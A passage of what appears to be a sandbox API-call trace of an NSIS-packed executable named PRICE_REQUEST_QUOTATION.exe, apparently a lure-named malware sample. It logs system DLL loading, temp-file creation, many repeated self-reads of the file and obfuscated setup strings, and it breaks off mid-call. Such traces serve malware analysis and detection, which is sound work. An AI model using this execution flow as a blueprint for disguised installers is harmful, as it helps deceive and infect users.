(in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\CRYPTBASE.dll") returned 14 [0092.590] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\CRYPTBASE.dll", hFile=0x0, dwFlags=0x8) returned 0x73f80000 [0092.590] lstrlenA (lpString="CRYPTBASE") returned 9 [0092.590] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0092.590] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\OLEACC.dll") returned 11 [0092.590] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\OLEACC.dll", hFile=0x0, dwFlags=0x8) returned 0x6c4e0000 [0093.122] lstrlenA (lpString="OLEACC") returned 6 [0093.122] GetSystemDirectoryA (in: lpBuffer=0x19fcc4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0093.122] wsprintfA (in: param_1=0x19fcd7, param_2="%s%s.dll" | out: param_1="\\CLBCATQ.dll") returned 12 [0093.122] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\CLBCATQ.dll", hFile=0x0, dwFlags=0x8) returned 0x74360000 [0093.572] lstrlenA (lpString="CLBCATQ") returned 7 [0093.572] GetModuleHandleA (lpModuleName="VERSION") returned 0x0 [0093.572] GetSystemDirectoryA (in: lpBuffer=0x19fcb4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0093.572] wsprintfA (in: param_1=0x19fcc7, param_2="%s%s.dll" | out: param_1="\\VERSION.dll") returned 12 [0093.572] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\VERSION.dll", hFile=0x0, dwFlags=0x8) returned 0x6c4d0000 [0093.836] GetProcAddress (hModule=0x6c4d0000, lpProcName="GetFileVersionInfoA") returned 0x6c4d1490 [0093.836] GetModuleHandleA (lpModuleName="SHFOLDER") returned 0x0 [0093.836] GetSystemDirectoryA (in: lpBuffer=0x19fcb4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0093.836] wsprintfA (in: param_1=0x19fcc7, param_2="%s%s.dll" | out: param_1="\\SHFOLDER.dll") returned 13 [0093.836] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\SHFOLDER.dll", hFile=0x0, dwFlags=0x8) returned 0x6c4c0000 [0093.905] GetProcAddress (hModule=0x6c4c0000, lpProcName="SHGetFolderPathA") returned 0x6c4c1300 [0093.905] InitCommonControls () [0093.905] OleInitialize (pvReserved=0x0) returned 0x0 [0094.005] SHGetFileInfoA (in: pszPath="", dwFileAttributes=0x0, psfi=0x19fe24, cbFileInfo=0x160, uFlags=0x0 | out: psfi=0x19fe24) returned 0x1 [0094.098] lstrcpynA (in: lpString1=0x42e420, lpString2="NSIS Error", iMaxLength=1024 | out: lpString1="NSIS Error") returned="NSIS Error" [0094.099] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe\" " [0094.099] lstrcpynA (in: lpString1=0x434000, lpString2="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe\" ", iMaxLength=1024 | out: lpString1="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe\" ") returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe\" " [0094.099] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0094.102] GetTempPathA (in: nBufferLength=0x400, lpBuffer=0x435400 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0094.108] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0094.108] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0094.108] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0094.136] GetLastError () returned 0xb7 [0094.136] GetTickCount () returned 0x1b9c235 [0094.136] GetTempFileNameA (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="nsp", uUnique=0x0, lpTempFileName=0x435000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspC235.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nspc235.tmp")) returned 0xc235 [0094.139] DeleteFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspC235.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nspc235.tmp")) returned 1 [0094.139] GetTickCount () returned 0x1b9c235 [0094.140] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x435c00, nSize=0x400 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\price_request_quotation.exe")) returned 0x39 [0094.140] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\price_request_quotation.exe")) returned 0x20 [0094.140] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\price_request_quotation.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0x1f8 [0094.140] lstrcpynA (in: lpString1=0x434c00, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe" [0094.140] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe") returned 57 [0094.141] lstrcpynA (in: lpString1=0x436000, lpString2="PRICE_REQUEST_QUOTATION.exe", iMaxLength=1024 | out: lpString1="PRICE_REQUEST_QUOTATION.exe") returned="PRICE_REQUEST_QUOTATION.exe" [0094.141] GetFileSize (in: hFile=0x1f8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41365 [0094.142] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.142] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.142] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.142] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.142] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.142] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.142] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.142] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.143] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.145] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.145] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.145] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.145] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.145] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.145] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.145] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.145] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.145] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.145] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.145] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.145] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.145] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.145] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.145] ReadFile (in: hFile=0x1f8, lpBuffer=0x420c50, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fdac, lpOverlapped=0x0 | out: lpBuffer=0x420c50*, lpNumberOfBytesRead=0x19fdac*=0x200, lpOverlapped=0x0) returned 1 [0094.146] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=34844, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x881c [0094.146] ReadFile (in: hFile=0x1f8, lpBuffer=0x19fdac, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fd30, lpOverlapped=0x0 | out: lpBuffer=0x19fdac*, lpNumberOfBytesRead=0x19fd30*=0x4, lpOverlapped=0x0) returned 1 [0094.146] GetTickCount () returned 0x1b9c235 [0094.146] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x16d0, lpNumberOfBytesRead=0x19fd30, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19fd30*=0x16d0, lpOverlapped=0x0) returned 1 [0094.149] GetTickCount () returned 0x1b9c245 [0094.149] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ef0 [0094.149] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74530000 [0094.149] GetProcAddress (hModule=0x74530000, lpProcName="GetUserDefaultUILanguage") returned 0x7454b0a0 [0094.149] GetUserDefaultUILanguage () returned 0x409 [0094.149] wsprintfA (in: param_1=0x435000, param_2="%d" | out: param_1="1033") returned 4 [0094.149] wsprintfA (in: param_1=0x435000, param_2="%d" | out: param_1="1033") returned 4 [0094.150] lstrlenA (lpString="jwfmxhqapdbzygp") returned 15 [0094.150] lstrcpynA (in: lpString1=0x42e420, lpString2="jwfmxhqapdbzygp Setup", iMaxLength=1024 | out: lpString1="jwfmxhqapdbzygp Setup") returned="jwfmxhqapdbzygp Setup" [0094.150] SetWindowTextA (hWnd=0x0, lpString="jwfmxhqapdbzygp Setup") returned 0 [0094.150] lstrcpynA (in: lpString1=0x709014, lpString2="candwykmjhzwxx", iMaxLength=1024 | out: lpString1="candwykmjhzwxx") returned="candwykmjhzwxx" [0094.150] lstrcpynA (in: lpString1=0x70942c, lpString2="vdevhzaateyt", iMaxLength=1024 | out: lpString1="vdevhzaateyt") returned="vdevhzaateyt" [0094.150] lstrcpynA (in: lpString1=0x709844, lpString2="cojmngggdtim", iMaxLength=1024 | out: lpString1="cojmngggdtim") returned="cojmngggdtim" [0094.150] lstrcpynA (in: lpString1=0x709c5c, lpString2="cremvnasdyf", iMaxLength=1024 | out: lpString1="cremvnasdyf") returned="cremvnasdyf" [0094.150] lstrcpynA (in: lpString1=0x42b4a8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0094.150] lstrcpynA (in: lpString1=0x42b4a8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0094.150] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: 